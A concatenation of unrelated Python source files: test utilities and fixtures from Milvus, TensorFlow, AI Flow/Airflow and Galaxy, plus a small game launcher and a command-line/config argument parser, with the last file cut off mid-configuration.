assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.level(2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
|
test_util.py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import math
import re
import sys
import threading
import numpy as np
import six
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import session
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import versions
from tensorflow.python.platform import googletest
from tensorflow.python.platform import logging
from tensorflow.python.util import compat
from tensorflow.python.util.protobuf import compare
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError(
"Expected op for node %s is different. %s vs %s" % (
node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError(
"Not all expected ops are present. Expected %s, found %s" % (
expected_ops.keys(), actual_ops.keys()))
return actual_ops
def assert_equal_graph_def(actual, expected):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def IsGoogleCudaEnabled():
return pywrap_tensorflow.IsGoogleCudaEnabled()
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
def __init__(self, methodName="runTest"):
super(TensorFlowTestCase, self).__init__(methodName)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
ops.reset_default_graph()
def tearDown(self):
for thread in self._threads:
self.assertFalse(thread.is_alive(), "A checkedThread did not terminate")
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
if not self._tempdir:
self._tempdir = googletest.GetTempDir()
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form
message: the message to validate
"""
if type(expected_message_maybe_ascii) == type(message):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message)
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type " +
type(expected_message_maybe_ascii) + " and " +
type(message))
def assertProtoEqualsVersion(
self, expected, actual, producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/gpu:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu and `use_gpu` are False, all ops are pinned to the CPU.
Example:
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/gpu:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(graph=None,
config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
with sess.graph.device("/gpu:0"):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
# pylint: disable=broad-except
except Exception as e:
# pylint: enable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._thread.join()
if self._exception is not None:
self._testcase.fail(
"Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: a float value.
f2: a float value.
err: a float value.
"""
self.assertTrue(math.fabs(f1 - f2) < err)
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
for f1, f2 in zip(farray1, farray2):
self.assertNear(f1, f2, err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays have near values.
Args:
a: a numpy ndarray or anything can be converted to one.
b: a numpy ndarray or anything can be converted to one.
rtol: relative tolerance
atol: absolute tolerance
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.abs(a - b) > atol + rtol * np.abs(b)
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: a numpy ndarray or anything can be converted to one.
b: a numpy ndarray or anything can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in OpError exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
errors.OpError exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message
op = e.op
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
# pylint: disable=broad-except
except Exception as e:
# pylint: enable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(e)
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `Device` object.
device2: A string device name or TensorFlow `Device` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
|
main.py | import asyncio
import sys
import threading
from monkey_patched.game import Game
# Init components
game = Game()
def start_server(loop):
from backend.server import main
threading.Thread(target=main, args=(loop,)).start()
def test_server(loop, rand_sleep=True):
from api_tester import ApiTester
threading.Thread(target=ApiTester(loop, rand_sleep=rand_sleep).start_test).start()
def run_ui():
from board_drawing import BDManager
BDManager()
if __name__ == '__main__':
_loop = asyncio.get_event_loop()
start_server(_loop)
if sys.argv.__len__() > 1 and sys.argv[1] == 'test':
test_server(_loop, rand_sleep=False)
run_ui()
|
airflow_scheduler_utils.py | # Copyright 2022 The AI Flow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import signal
import threading
import time
import os
import logging
import multiprocessing as mp
from subprocess import Popen
from ai_flow.plugin_interface.scheduler_interface import WorkflowExecutionInfo
from airflow.contrib.jobs.event_based_scheduler_job import EventBasedSchedulerJob
from airflow.events.scheduler_events import StopSchedulerEvent
from airflow.executors.local_executor import LocalExecutor
from typing import Callable
from notification_service.client import NotificationClient
def start_scheduler(file_path, port=50052, executor=None):
if executor is None:
executor = LocalExecutor(15)
scheduler = EventBasedSchedulerJob(
dag_directory=file_path,
notification_server_uri="localhost:{}".format(port),
executor=executor,
max_runs=-1,
refresh_dag_dir_interval=30
)
print("scheduler starting")
scheduler.run()
def start_airflow_scheduler_server(file_path, port=50052) -> mp.Process:
mp.set_start_method('spawn')
process = mp.Process(target=start_scheduler, args=(file_path, port))
process.start()
return process
def start_airflow_web_server() -> Popen:
def pre_exec():
# Restore default signal disposition and invoke setsid
for sig in ('SIGPIPE', 'SIGXFZ', 'SIGXFSZ'):
if hasattr(signal, sig):
signal.signal(getattr(signal, sig), signal.SIG_DFL)
os.setsid()
env = os.environ.copy()
stdout_log = './web.log'
with open(stdout_log, 'w') as out:
sub_process = Popen( # pylint: disable=subprocess-popen-preexec-fn
'airflow webserver -p 8080',
stdout=out,
stderr=out,
env=env,
shell=True,
preexec_fn=pre_exec,
)
logging.info('Process pid: %s', sub_process.pid)
return sub_process
def run_ai_flow_workflow(dag_id, test_function: Callable[[NotificationClient], None], port=50052, executor=None):
def run_test_fun():
time.sleep(5)
client = NotificationClient(server_uri="localhost:{}".format(port),
default_namespace="test")
try:
test_function(client)
except Exception as e:
raise e
finally:
client.send_event(StopSchedulerEvent(job_id=0).to_event())
t = threading.Thread(target=run_test_fun, args=())
t.setDaemon(True)
t.start()
dag_file = '/tmp/airflow/' + dag_id + '.py'
start_scheduler(file_path=dag_file, port=port, executor=executor)
def get_dag_id(namespace, workflow_name):
return '{}.{}'.format(namespace, workflow_name)
class WorkflowExecutionWrapper(object):
def __init__(self):
self.workflow_execution_info: WorkflowExecutionInfo = None
workflow_wrapper = WorkflowExecutionWrapper()
def set_workflow_execution_info(workflow_execution_info: WorkflowExecutionInfo):
global workflow_wrapper
workflow_wrapper.workflow_execution_info = workflow_execution_info
def get_workflow_execution_info() -> WorkflowExecutionInfo:
global workflow_wrapper
return workflow_wrapper.workflow_execution_info
|
conftest.py | from pytest import fixture
@fixture
def http_port():
return 8080
@fixture
def mock_app(tmpdir):
def _mock_app(environ, start_response):
""" self verify mock app """
import wsgiref
import json
request_uri = wsgiref.util.request_uri(environ)
assert environ['REQUEST_METHOD'].upper() == 'POST'
post_env = environ.copy()
post_data = json.loads(
post_env['wsgi.input'].read(int(post_env['CONTENT_LENGTH'])))
assert post_data['foo']
# return fake response
start_response('200 OK', [('Content-Type', 'application/json')])
return [
bytes(json.dumps(dict(
status='yeah!',
foo=post_data['foo'],
request_uri=request_uri)), 'utf-8')
]
return _mock_app
@fixture(autouse=True)
def mock_callback(tmpdir, mock_app, http_port):
""" mock callback handler """
from wsgiref.simple_server import make_server
import multiprocessing
server = make_server('', 8080, mock_app)
server_process = multiprocessing.Process(target=server.serve_forever)
server_process.start()
yield
server_process.terminate()
server_process.join()
del(server_process)
|
arg.py | import sys
import configparser
import torch
import threading
import time
import os
__author__ = 'namju.kim@kakaobrain.com'
_config_time_stamp = 0
class _Opt(object):
def __len__(self):
return len(self.__dict__)
def __setitem__(self, key, value):
self.__dict__[key] = value
def __getitem__(self, item):
if item in self.__dict__:
return self.__dict__[item]
else:
return None
def __getattr__(self, item):
return self.__getitem__(item)
def _to_py_obj(x):
# check boolean first
if x.lower() in ['true', 'yes', 'on']:
return True
if x.lower() in ['false', 'no', 'off']:
return False
# from string to python object if possible
try:
obj = eval(x)
if type(obj).__name__ in ['int', 'float', 'tuple', 'list', 'dict', 'NoneType']:
x = obj
except:
pass
return x
def _parse_config(arg, file):
# read config file
config = configparser.ConfigParser()
config.read(file)
# traverse sections
for section in config.sections():
# traverse items
opt = _Opt()
for key in config[section]:
opt[key] = _to_py_obj(config[section][key])
# if default section, save items to global scope
if section.lower() == 'default':
for k, v in opt.__dict__.items():
arg[k] = v
else:
arg['_'.join(section.split())] = opt
def _parse_config_thread(arg, file):
global _config_time_stamp
while True:
# check timestamp
stamp = os.stat(file).st_mtime
if not stamp == _config_time_stamp:
# update timestamp
_config_time_stamp = stamp
# parse config file
_parse_config(arg, file)
# print result
# _print_opts(arg, 'CONFIGURATION CHANGE DETECTED')
# sleep
time.sleep(1)
def _print_opts(arg, header):
print(header, flush=True)
print('-' * 30, flush=True)
for k, v in arg.__dict__.items():
print('%s=%s' % (k, v), flush=True)
print('-' * 30, flush=True)
def _parse_opts():
global _config_time_stamp
# get command line arguments
arg = _Opt()
argv = sys.argv[1:]
# check length
assert len(argv) % 2 == 0, 'arguments should be paired with the format of --key value'
# parse args
for i in range(0, len(argv), 2):
# check format
assert argv[i].startswith('--'), 'arguments should be paired with the format of --key value'
# save argument
arg[argv[i][2:]] = _to_py_obj(argv[i + 1])
# check config file
if argv[i][2:].lower() == 'config':
_parse_config(arg, argv[i + 1])
_config_time_stamp = os.stat(argv[i + 1]).st_mtime
#
# inject default options
#
# device setting
if arg.device is None:
arg.device = 'cuda' if torch.cuda.is_available() else 'cpu'
arg.device = torch.device(arg.device)
arg.cuda = arg.device.type == 'cuda'
# default learning rate
#arg.lr = 1e-3
# directories
arg.log_dir = arg.log_dir or 'asset/log/'
arg.data_dir = arg.data_dir or 'asset/data/'
arg.save_dir = arg.save_dir or 'asset/train/'
arg.log_dir += '' if arg.log_dir.endswith('/') else '/'
arg.data_dir += '' if arg.data_dir.endswith('/') else '/'
arg.save_dir += '' if arg.save_dir.endswith('/') else '/'
# print arg option
# _print_opts(arg, 'CONFIGURATION')
# start config file watcher if config is defined
if arg.config:
t = threading.Thread(target=_parse_config_thread, args=(arg, arg.config))
t.daemon = True
t.start()
return arg
|
driver_util.py | """Scripts for drivers of Galaxy functional tests."""
import fcntl
import logging
import os
import random
import re
import shutil
import signal
import socket
import string
import struct
import subprocess
import sys
import tempfile
import threading
import time
import nose.config
import nose.core
import nose.loader
import nose.plugins.manager
import yaml
from paste import httpserver
from six.moves import (
http_client,
shlex_quote
)
from six.moves.urllib.parse import urlparse
from sqlalchemy_utils import (
create_database,
database_exists,
)
from galaxy.app import UniverseApplication as GalaxyUniverseApplication
from galaxy.config import LOGGING_CONFIG_DEFAULT
from galaxy.model import mapping
from galaxy.model.tool_shed_install import mapping as toolshed_mapping
from galaxy.tool_util.verify.interactor import GalaxyInteractorApi, verify_tool
from galaxy.util import asbool, download_to_file, galaxy_directory
from galaxy.util.properties import load_app_properties
from galaxy.web import buildapp
from galaxy_test.base.api_util import get_master_api_key, get_user_api_key
from galaxy_test.base.instrument import StructuredTestDataPlugin
from galaxy_test.base.nose_util import run
from tool_shed.webapp.app import UniverseApplication as ToolshedUniverseApplication
from .test_logging import logging_config_file
galaxy_root = galaxy_directory()
DEFAULT_WEB_HOST = socket.gethostbyname('localhost')
DEFAULT_CONFIG_PREFIX = "GALAXY"
GALAXY_TEST_DIRECTORY = os.path.join(galaxy_root, "test")
GALAXY_TEST_FILE_DIR = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
TOOL_SHED_TEST_DATA = os.path.join(galaxy_root, "lib", "tool_shed", "test", "test_data")
TEST_WEBHOOKS_DIR = os.path.join(galaxy_root, "test", "functional", "webhooks")
FRAMEWORK_TOOLS_DIR = os.path.join(GALAXY_TEST_DIRECTORY, "functional", "tools")
FRAMEWORK_UPLOAD_TOOL_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "upload_tool_conf.xml")
FRAMEWORK_SAMPLE_TOOLS_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "samples_tool_conf.xml")
FRAMEWORK_DATATYPES_CONF = os.path.join(FRAMEWORK_TOOLS_DIR, "sample_datatypes_conf.xml")
MIGRATED_TOOL_PANEL_CONFIG = 'config/migrated_tools_conf.xml'
INSTALLED_TOOL_PANEL_CONFIGS = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
REALTIME_PROXY_TEMPLATE = string.Template(r"""
uwsgi:
http-raw-body: true
interactivetools_map: $tempdir/interactivetools_map.sqlite
python-raw: scripts/interactivetools/key_type_token_mapping.py
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ goto:interactivetool
route-run: goto:endendend
route-label: interactivetool
route-host: ^([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)-([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.([A-Za-z0-9]+(?:-[A-Za-z0-9]+)*)\.(interactivetool\.$test_host:$test_port)$ rpcvar:TARGET_HOST rtt_key_type_token_mapper_cached $1 $3 $2 $4 $0 5
route-if-not: empty:${TARGET_HOST} httpdumb:${TARGET_HOST}
route: .* break:404 Not Found
route-label: endendend
""")
DEFAULT_LOCALES = "en"
log = logging.getLogger("test_driver")
# Global variables to pass database contexts around - only needed for older
# Tool Shed twill tests that didn't utilize the API for such interactions.
galaxy_context = None
tool_shed_context = None
install_context = None
def setup_tool_shed_tmp_dir():
tool_shed_test_tmp_dir = os.environ.get('TOOL_SHED_TEST_TMP_DIR', None)
if tool_shed_test_tmp_dir is None:
tool_shed_test_tmp_dir = os.path.realpath(tempfile.mkdtemp())
# Here's the directory where everything happens. Temporary directories are created within this directory to contain
# the hgweb.config file, the database, new repositories, etc. Since the tool shed browses repository contents via HTTP,
# the full path to the temporary directroy wher eht repositories are located cannot contain invalid url characters.
os.environ['TOOL_SHED_TEST_TMP_DIR'] = tool_shed_test_tmp_dir
return tool_shed_test_tmp_dir
def get_galaxy_test_tmp_dir():
"""Create test directory for use by Galaxy server being setup for testing."""
galaxy_test_tmp_dir = os.environ.get('GALAXY_TEST_TMP_DIR', None)
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
return galaxy_test_tmp_dir
def configure_environment():
"""Hack up environment for test cases."""
# no op remove if unused
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ['HTTP_ACCEPT_LANGUAGE'] = DEFAULT_LOCALES
# Used by get_filename in tool shed's twilltestcase.
if "TOOL_SHED_TEST_FILE_DIR" not in os.environ:
os.environ["TOOL_SHED_TEST_FILE_DIR"] = TOOL_SHED_TEST_DATA
os.environ["GALAXY_TEST_ENVIRONMENT_CONFIGURED"] = "1"
def build_logger():
"""Build a logger for test driver script."""
return log
def ensure_test_file_dir_set():
"""Ensure GALAXY_TEST_FILE_DIR setup in environment for test data resolver.
Return first directory for backward compat.
"""
galaxy_test_file_dir = os.environ.get('GALAXY_TEST_FILE_DIR', GALAXY_TEST_FILE_DIR)
os.environ['GALAXY_TEST_FILE_DIR'] = galaxy_test_file_dir
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
return first_test_file_dir
def setup_galaxy_config(
tmpdir,
use_test_file_dir=False,
default_install_db_merged=True,
default_tool_data_table_config_path=None,
default_shed_tool_data_table_config=None,
default_job_config_file=None,
enable_tool_shed_check=False,
default_tool_conf=None,
shed_tool_conf=None,
datatypes_conf=None,
update_integrated_tool_panel=False,
prefer_template_database=False,
log_format=None,
conda_auto_init=False,
conda_auto_install=False,
use_shared_connection_for_amqp=False,
):
"""Setup environment and build config for test Galaxy instance."""
# For certain docker operations this needs to be evaluated out - e.g. for cwltool.
tmpdir = os.path.realpath(tmpdir)
if not os.path.exists(tmpdir):
os.makedirs(tmpdir)
template_cache_path = tempfile.mkdtemp(prefix='compiled_templates_', dir=tmpdir)
new_file_path = tempfile.mkdtemp(prefix='new_files_path_', dir=tmpdir)
job_working_directory = tempfile.mkdtemp(prefix='job_working_directory_', dir=tmpdir)
if use_test_file_dir:
first_test_file_dir = ensure_test_file_dir_set()
if not os.path.isabs(first_test_file_dir):
first_test_file_dir = os.path.join(galaxy_root, first_test_file_dir)
library_import_dir = first_test_file_dir
import_dir = os.path.join(first_test_file_dir, 'users')
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
else:
user_library_import_dir = None
library_import_dir = None
job_config_file = os.environ.get('GALAXY_TEST_JOB_CONFIG_FILE', default_job_config_file)
tool_path = os.environ.get('GALAXY_TEST_TOOL_PATH', 'tools')
tool_data_table_config_path = _tool_data_table_config_path(default_tool_data_table_config_path)
default_data_manager_config = None
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml']:
if os.path.exists(data_manager_config):
default_data_manager_config = data_manager_config
data_manager_config_file = "test/functional/tools/sample_data_manager_conf.xml"
if default_data_manager_config is not None:
data_manager_config_file = "%s,%s" % (default_data_manager_config, data_manager_config_file)
master_api_key = get_master_api_key()
cleanup_job = 'never' if ("GALAXY_TEST_NO_CLEANUP" in os.environ or
"TOOL_SHED_TEST_NO_CLEANUP" in os.environ) else 'onsuccess'
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
galaxy_data_manager_data_path = tempfile.mkdtemp(prefix='data_manager_tool-data', dir=tmpdir)
tool_conf = os.environ.get('GALAXY_TEST_TOOL_CONF', default_tool_conf)
conda_auto_install = os.environ.get('GALAXY_TEST_CONDA_AUTO_INSTALL', conda_auto_install)
conda_auto_init = os.environ.get('GALAXY_TEST_CONDA_AUTO_INIT', conda_auto_init)
conda_prefix = os.environ.get('GALAXY_TEST_CONDA_PREFIX')
if tool_conf is None:
# As a fallback always at least allow upload.
tool_conf = FRAMEWORK_UPLOAD_TOOL_CONF
if shed_tool_conf is not None:
tool_conf = "%s,%s" % (tool_conf, shed_tool_conf)
shed_tool_data_table_config = default_shed_tool_data_table_config
config = dict(
admin_users='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
api_allow_run_as='test@bx.psu.edu',
auto_configure_logging=logging_config_file is None,
check_migrate_tools=False,
chunk_upload_size=100,
